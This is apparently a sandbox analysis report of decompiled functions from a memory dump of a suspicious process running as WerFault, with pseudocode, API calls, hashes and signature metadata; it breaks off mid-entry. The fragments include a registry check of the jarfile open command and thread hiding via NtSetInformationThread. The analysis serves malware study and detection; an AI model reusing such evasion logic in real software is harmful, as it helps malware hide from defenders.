                        			E02862B90(void* __ecx, void* _a4, char* _a8) {
				void* _v8;
				long _t8;
				int _t9;
				int _t12;

				_t12 = 0;
				_v8 = 0;
				_t8 = RegOpenKeyExA(_a4, _a8, 0, 1,  &_v8); // executed
				if(_t8 == 0) {
					if(_v8 != 0) {
						_t12 = 1;
						 *0x289fb1c(_v8);
					}
					_t9 = _t12;
				} else {
					_t9 = 0;
				}
				return _t9;
			}







                        0x02862b9b
                        0x02862ba1
                        0x02862ba7
                        0x02862baf
                        0x02862bb8
                        0x02862bbd
                        0x02862bbf
                        0x02862bbf
                        0x02862bc5
                        0x02862bb1
                        0x02862bb1
                        0x02862bb1
                        0x02862bc9

                        APIs
                        • RegOpenKeyExA.KERNELBASE(?,028A0044,00000000,00000001,00000000,00000160,?,?,0286CF24,80000000,jarfile\shell\open\command,?,00000000,00000160,?,00000000), ref: 02862BA7
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Open
                        • String ID:
                        • API String ID: 71445658-0
                        • Opcode ID: 8b0f28a8ddefe6335aec4c7d71149927f82fe1dacb4c1d50c96f55474f7a60db
                        • Instruction ID: 3a090ba77715f6f6a3d22113e7154ae8f12e930cf1a1d54edb91921a69b52a6b
                        • Opcode Fuzzy Hash: 8b0f28a8ddefe6335aec4c7d71149927f82fe1dacb4c1d50c96f55474f7a60db
                        • Instruction Fuzzy Hash: BAE0ED79640209FFDF419EA0D889DEE776CEB15348B1484A6A90192150D6729E14AA20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02864199 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • ObtainUserAgentString.URLMON(00000000,00000104,000000C0,?,?,0287A91F,?,?,00000000,00000104,000000C0), ref: 028641BC
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: AgentObtainStringUser
                        • String ID:
                        • API String ID: 2681117516-0
                        • Opcode ID: daece715754ac1e9288faa0e27fb4f3df0ff38ac7971ce9d77c61ee756211680
                        • Instruction ID: d56a1d5a384ffbf11a685c170c039648e8772f39dc7f369a2dc2ffd334512fcf
                        • Opcode Fuzzy Hash: daece715754ac1e9288faa0e27fb4f3df0ff38ac7971ce9d77c61ee756211680
                        • Instruction Fuzzy Hash: 7BE04F7D915209FB8F28CF94DC84ABE76B49B653857208A2DE105E6500D374DB40DB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288DC1D Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesW.KERNEL32(00000000), ref: 0288DC35
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 6133915dd93ea68f2d5015dc6c280e35f0571aa3ccb4e9352814f4af2aa2d476
                        • Instruction ID: 2980dcf7b1c7ceebce645b0e2a4037f420abdf51367faa120806361574d9f74a
                        • Opcode Fuzzy Hash: 6133915dd93ea68f2d5015dc6c280e35f0571aa3ccb4e9352814f4af2aa2d476
                        • Instruction Fuzzy Hash: 08E04F3D4801089BEE183B70A54C26837AA6B35325F644900E329D46D0C7B184A0EA20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028617E4 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E028617E4(void* _a4) {
				void* _t3;
				char _t4;

				if(_a4 != 0) {
					_t3 =  *0x289f904();
					if(_t3 != 0) {
						_t4 = RtlFreeHeap(_t3, 0, _a4); // executed
						return _t4;
					}
				}
				return _t3;
			}





                        0x028617eb
                        0x028617ed
                        0x028617f5
                        0x028617fd
                        0x00000000
                        0x028617fd
                        0x028617f5
                        0x02861804

                        APIs
                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,0286175C,00000000,00000000,00000000,00000002,kernel32.dll,?,?,02866361), ref: 028617FD
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 2b3ed7d9b1322a518460adba53bac5b2fce34e41810f48fa08df99ec835e71b2
                        • Instruction ID: 9e4a52c7e4ba8ed1dc9f6e044f487eda9f81c210dc61d1dc0f9f442ceb188853
                        • Opcode Fuzzy Hash: 2b3ed7d9b1322a518460adba53bac5b2fce34e41810f48fa08df99ec835e71b2
                        • Instruction Fuzzy Hash: CFD0C93954020DAEDB145B95E90CBB53A9C9B20B47F284421BA0DD4591C7709560C6A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0286DDFF Relevance: 1.4, APIs: 1, Instructions: 112sleepCOMMON
                        Download Yara Rule
                        C-Code - Quality: 83%
                        			E0286DDFF(signed int __ebx, intOrPtr* __ecx, void* __edx) {
				char _v8;
				void* __edi;
				void* _t17;
				intOrPtr _t27;
				void* _t32;
				void* _t39;
				signed char _t50;
				intOrPtr _t52;
				void* _t53;

				_t53 = __edx;
				_t51 = __ecx;
				_t50 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t61 = __ebx;
				if(__ebx != 0) {
					__eflags = __ebx & 0x00000002;
					if(__eflags == 0) {
						L4:
						if(_t50 == 0 || (_t50 & 0x00000001) != 0) {
							E0286E9F0(_t51); // executed
						}
						if(_t50 == 0 || (_t50 & 0x00000004) != 0) {
							E0286E89A();
						}
						if(_t50 != 0) {
							L22:
							_t17 = 1;
							goto L23;
						} else {
							if(E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff) == 1 ||  *0x28a0654 != 0) {
								_t51 = 0x28a0650;
								 *0x28a0650 = 0;
								 *0x28a0648 = 0;
								 *0x28a0644 = 0; // executed
								E02863F33(0x28a0650); // executed
								E0287D504(0x80); // executed
								E0287D6B6(0x28a0650, 0); // executed
							}
							 *0x289fdd4 = 0x400;
							_t27 = E0286161B(0x42000);
							 *0x28a0040 = _t27;
							_t70 = _t27;
							if(_t27 == 0) {
								 *0x289fdd4 = 0; // executed
							}
							E02874FB6(_t51, _t70); // executed
							E0288CEE2(_t51, _t70); // executed
							_t32 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
							_t71 = _t32 - 1;
							if(_t32 == 1) {
								 *0x289f8b0(0x28a0628, 0xfa0);
								E0288B5C5();
								E02875A56(0xfa0, _t71);
								E028770C0(_t51, _t71);
							}
							L02887B81(_t53, _t71);
							E0287F8DF(0x28a0500);
							_push(0xfa0);
							_push(0x28a04e8);
							if( *0x289f8b0() != 0) {
								_v8 = 0;
								 *0x28a4108 = 0;
								 *0x28a4100 = 0;
								 *0x28a40fc = 0;
								 *0x28a410c = 0;
								 *0x28a4104 = 0; // executed
								E02884444(_t51,  &_v8); // executed
								_t52 =  *0x289f2e8;
								_t39 = E0286D774( *(_t52 + 4) & 0x0000ffff);
								__eflags = _t39 - 1;
								if(_t39 == 1) {
									 *((intOrPtr*)(_t52 + 0x16a)) = _v8;
									Sleep(0x1e); // executed
									E02884512(0xecd,  *0x289fdb4, 0xccccccb2); // executed
									E02884512(0xecb,  *0x28a4104, _v8); // executed
									E02884512(0xec9, 0xc0001,  *0x289fdb4); // executed
									E02875A06(_t52, __eflags);
								}
								goto L22;
							} else {
								_t17 = 0;
								L23:
								return _t17;
							}
						}
					}
					L3:
					E0286E9A2(_t61); // executed
					goto L4;
				}
				E0286E93A(_t61);
				goto L3;
			}












                        0x0286ddff
                        0x0286ddff
                        0x0286ddff
                        0x0286de02
                        0x0286de03
                        0x0286de08
                        0x0286de0a
                        0x0286de13
                        0x0286de16
                        0x0286de1d
                        0x0286de1f
                        0x0286de26
                        0x0286de26
                        0x0286de2d
                        0x0286de34
                        0x0286de34
                        0x0286de3b
                        0x0286df9a
                        0x0286df9a
                        0x00000000
                        0x0286de41
                        0x0286de52
                        0x0286de5e
                        0x0286de63
                        0x0286de65
                        0x0286de6b
                        0x0286de71
                        0x0286de7b
                        0x0286de80
                        0x0286de80
                        0x0286de8a
                        0x0286de94
                        0x0286de99
                        0x0286de9e
                        0x0286dea0
                        0x0286dea2
                        0x0286dea2
                        0x0286dea8
                        0x0286dead
                        0x0286debc
                        0x0286dec6
                        0x0286dec8
                        0x0286ded0
                        0x0286ded6
                        0x0286dedb
                        0x0286dee0
                        0x0286dee0
                        0x0286dee5
                        0x0286deef
                        0x0286def4
                        0x0286def5
                        0x0286df02
                        0x0286df0f
                        0x0286df12
                        0x0286df18
                        0x0286df1e
                        0x0286df24
                        0x0286df2a
                        0x0286df30
                        0x0286df35
                        0x0286df40
                        0x0286df45
                        0x0286df47
                        0x0286df4e
                        0x0286df54
                        0x0286df6a
                        0x0286df7b
                        0x0286df90
                        0x0286df95
                        0x0286df95
                        0x00000000
                        0x0286df04
                        0x0286df04
                        0x0286df9c
                        0x0286df9f
                        0x0286df9f
                        0x0286df02
                        0x0286de3b
                        0x0286de18
                        0x0286de18
                        0x00000000
                        0x0286de18
                        0x0286de0c
                        0x00000000

                        APIs
                          • Part of subcall function 02884444: Sleep.KERNEL32(000000C8,00000FA0,0288E905,00000000,00000000,00000016,00000000,00000000,00000050,00000000,?,?,0286DF35,0286E0E2), ref: 02884471
                        • Sleep.KERNEL32(0000001E,?,0286E0E2,?,0286E0E2), ref: 0286DF54
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: ac849cedba77418991424255e408e7d15a5f2fb1f910444dda1e6fe352ea78c0
                        • Instruction ID: e91cbf5de8d7fc6c339dd26e63dfcad1f0db25d2fec98a1a762030de97f652b0
                        • Opcode Fuzzy Hash: ac849cedba77418991424255e408e7d15a5f2fb1f910444dda1e6fe352ea78c0
                        • Instruction Fuzzy Hash: C431E27DF812109AEB60BFEC9949B7C37A6AF64B04F144856F205D6581CBB54051CFA3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02882053 Relevance: 1.3, APIs: 1, Instructions: 83COMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E02882053(void* __ecx) {
				void* _t92;

				E02880778( *((intOrPtr*)(_t92 - 0x7c)), __ecx,  *((intOrPtr*)(_t92 - 0x2a4)),  *(_t92 - 4),  *(_t92 - 0x22) +  *((intOrPtr*)(_t92 - 0x29c))); // executed
				if( *(_t92 + 0x1c) == 0 || ( *( *(_t92 + 0x1c)) & 0x0000ffff) != 0x22) {
					 *(_t92 - 0x2b2) = 1;
				} else {
					 *(_t92 - 0x2b2) = 0;
				}
				if(( *(_t92 - 0x2b2) & 0x000000ff) == 0) {
					( *(_t92 + 0x1c))[1] = ( *(_t92 + 0x1c))[1] & 0x00000000;
					( *(_t92 + 0x1c))[3] =  *(_t92 - 0x22);
					( *(_t92 + 0x1c))[5] =  *(_t92 - 0x26);
					( *(_t92 + 0x1c))[7] =  *(_t92 - 4);
					( *(_t92 + 0x1c))[0xd] =  *(_t92 - 0x84);
					( *(_t92 + 0x1c))[9] =  *(_t92 - 0x26) +  *((intOrPtr*)(_t92 - 0x29c));
					( *(_t92 + 0x1c))[0xb] =  *(_t92 - 0x22) +  *((intOrPtr*)(_t92 - 0x29c));
					( *(_t92 + 0x1c))[0xf] = ( *(_t92 + 0x1c))[0xf] & 0x00000000;
				}
				VirtualFree( *(_t92 - 0x10), 0, 0x8000); // executed
				if( *((intOrPtr*)(_t92 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t92 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t92 - 0x2a4)));
				}
				if( *(_t92 + 0xc) == 0 || ( *( *(_t92 + 0xc)) & 0x0000ffff) != 0xe) {
					 *(_t92 - 0x2b3) = 1;
				} else {
					 *(_t92 - 0x2b3) = 0;
				}
				if(( *(_t92 - 0x2b3) & 0x000000ff) == 1 ||  *(_t92 + 0xc) != 0 && (( *(_t92 + 0xc))[3] & 0x00000001) == 0) {
					E02880F88(_t92 - 0x30);
				}
				 *0x289f824( *((intOrPtr*)(_t92 - 0x2e)));
				E028617E4( *((intOrPtr*)(_t92 - 0x70))); // executed
				return 0;
			}




                        0x02882099
                        0x028820a2
                        0x028820b8
                        0x028820af
                        0x028820af
                        0x028820af
                        0x028820c8
                        0x028820cd
                        0x028820d7
                        0x028820e0
                        0x028820e9
                        0x028820f5
                        0x02882104
                        0x02882113
                        0x02882119
                        0x02882119
                        0x02882127
                        0x02882134
                        0x02882142
                        0x02882142
                        0x0288214c
                        0x02882162
                        0x02882159
                        0x02882159
                        0x02882159
                        0x02882173
                        0x02882189
                        0x02882189
                        0x02882191
                        0x0288219a
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000006,00000000,00000D56,00000006,00000000,00002672,00000000,?,00000040,00000000), ref: 02882127
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: d1ca62634af6de2e9cd42cc9611e10b8f3dfbfff6f031acb72ebfc8cb89a4a7c
                        • Instruction ID: 9897284546d39d5ab3f542ebaaaa33c678b0d82cea3ae2ecf87cc34c219c8625
                        • Opcode Fuzzy Hash: d1ca62634af6de2e9cd42cc9611e10b8f3dfbfff6f031acb72ebfc8cb89a4a7c
                        • Instruction Fuzzy Hash: DA41E83DA04259DFCB25EF48C848BADB7B1BF09305F148096E919EB295C735E954DF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02882055 Relevance: 1.3, APIs: 1, Instructions: 76COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02882055() {
				void* _t82;

				if( *(_t82 + 0x1c) == 0 || ( *( *(_t82 + 0x1c)) & 0x0000ffff) != 0x22) {
					 *(_t82 - 0x2b2) = 1;
				} else {
					 *(_t82 - 0x2b2) = 0;
				}
				if(( *(_t82 - 0x2b2) & 0x000000ff) == 0) {
					( *(_t82 + 0x1c))[1] = ( *(_t82 + 0x1c))[1] & 0x00000000;
					( *(_t82 + 0x1c))[3] =  *(_t82 - 0x22);
					( *(_t82 + 0x1c))[5] =  *(_t82 - 0x26);
					( *(_t82 + 0x1c))[7] =  *(_t82 - 4);
					( *(_t82 + 0x1c))[0xd] =  *(_t82 - 0x84);
					( *(_t82 + 0x1c))[9] =  *(_t82 - 0x26) +  *((intOrPtr*)(_t82 - 0x29c));
					( *(_t82 + 0x1c))[0xb] =  *(_t82 - 0x22) +  *((intOrPtr*)(_t82 - 0x29c));
					( *(_t82 + 0x1c))[0xf] = ( *(_t82 + 0x1c))[0xf] & 0x00000000;
				}
				VirtualFree( *(_t82 - 0x10), 0, 0x8000); // executed
				if( *((intOrPtr*)(_t82 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t82 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t82 - 0x2a4)));
				}
				if( *(_t82 + 0xc) == 0 || ( *( *(_t82 + 0xc)) & 0x0000ffff) != 0xe) {
					 *(_t82 - 0x2b3) = 1;
				} else {
					 *(_t82 - 0x2b3) = 0;
				}
				if(( *(_t82 - 0x2b3) & 0x000000ff) == 1 ||  *(_t82 + 0xc) != 0 && (( *(_t82 + 0xc))[3] & 0x00000001) == 0) {
					E02880F88(_t82 - 0x30);
				}
				 *0x289f824( *((intOrPtr*)(_t82 - 0x2e)));
				E028617E4( *((intOrPtr*)(_t82 - 0x70))); // executed
				return 0;
			}




                        0x028820a2
                        0x028820b8
                        0x028820af
                        0x028820af
                        0x028820af
                        0x028820c8
                        0x028820cd
                        0x028820d7
                        0x028820e0
                        0x028820e9
                        0x028820f5
                        0x02882104
                        0x02882113
                        0x02882119
                        0x02882119
                        0x02882127
                        0x02882134
                        0x02882142
                        0x02882142
                        0x0288214c
                        0x02882162
                        0x02882159
                        0x02882159
                        0x02882159
                        0x02882173
                        0x02882189
                        0x02882189
                        0x02882191
                        0x0288219a
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000006,00000000,00000D56,00000006,00000000,00002672,00000000,?,00000040,00000000), ref: 02882127
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 77e1b1fad58d1e68a77a86d9778437408aceffbb1b31d438a13a5424fac4b126
                        • Instruction ID: 89a1e833461318f2666a41e838f35f1190dfac6be84ec96c474d1f0eda812e56
                        • Opcode Fuzzy Hash: 77e1b1fad58d1e68a77a86d9778437408aceffbb1b31d438a13a5424fac4b126
                        • Instruction Fuzzy Hash: 8231D33DA04259CFCB25EF48C848BADB7B1BF05305F14809AE919EB295C334E995CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02884444 Relevance: 1.3, APIs: 1, Instructions: 34sleepCOMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E02884444(void* __ecx, signed int* _a4) {
				signed int _v8;
				intOrPtr _t7;
				signed int* _t9;
				signed int _t12;
				intOrPtr _t15;

				_t10 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t7 = E02865E00(E0288E905, 0, 0, 0x16, 0,  &_v8, 0x50); // executed
				_t15 = _t7;
				if(_t15 != 0) {
					Sleep(0xc8); // executed
					_t12 = _v8;
					 *0x28a40fc = _t15;
					 *0x28a410c = _t12; // executed
					E02865BED(_t10, _t15); // executed
					_t9 = _a4;
					if(_t9 != 0) {
						 *_t9 = _t12;
					}
					_t7 = _t15;
				}
				return _t7;
			}








                        0x02884444
                        0x02884447
                        0x02884448
                        0x02884460
                        0x02884465
                        0x02884469
                        0x02884471
                        0x02884477
                        0x0288447b
                        0x02884481
                        0x02884487
                        0x0288448c
                        0x02884491
                        0x02884493
                        0x02884493
                        0x02884495
                        0x02884497
                        0x0288449a

                        APIs
                        • Sleep.KERNEL32(000000C8,00000FA0,0288E905,00000000,00000000,00000016,00000000,00000000,00000050,00000000,?,?,0286DF35,0286E0E2), ref: 02884471
                          • Part of subcall function 02865BED: NtSetInformationThread.NTDLL(00000000,00000003,000000FF,00000004,?,?,0288448C,00000000,?,?,0286DF35,0286E0E2), ref: 02865C06
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationSleepThread
                        • String ID:
                        • API String ID: 1275441292-0
                        • Opcode ID: 420c1dcc6fd5ca37c9a68e370f23098718e8f1ec16bb2b400b44fbd0291071a9
                        • Instruction ID: b217267436c2cb8d90756f73f8beb879471ec7bb04b9d019f1434fa26cea4df1
                        • Opcode Fuzzy Hash: 420c1dcc6fd5ca37c9a68e370f23098718e8f1ec16bb2b400b44fbd0291071a9
                        • Instruction Fuzzy Hash: B8F0E97EB81314BBE720AF899C06F5A77ACDB81B41F544015B600FB1C0D7F499009FA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881BEB Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881BEB(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: b589f7717b82c2c5a3337530131b505c6f4f907840b4ed12ec4282c28ab8671e
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: b589f7717b82c2c5a3337530131b505c6f4f907840b4ed12ec4282c28ab8671e
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881E8A Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881E8A(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 10cc68514a679643c8bda60f1690985613dfc1abdf016630edff4db1e33fa482
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 10cc68514a679643c8bda60f1690985613dfc1abdf016630edff4db1e33fa482
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881EDB Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881EDB(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 3ffc2a3f713032aed3c3f34df3e910550cfc0ce476398e6034f2797bac4235e3
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 3ffc2a3f713032aed3c3f34df3e910550cfc0ce476398e6034f2797bac4235e3
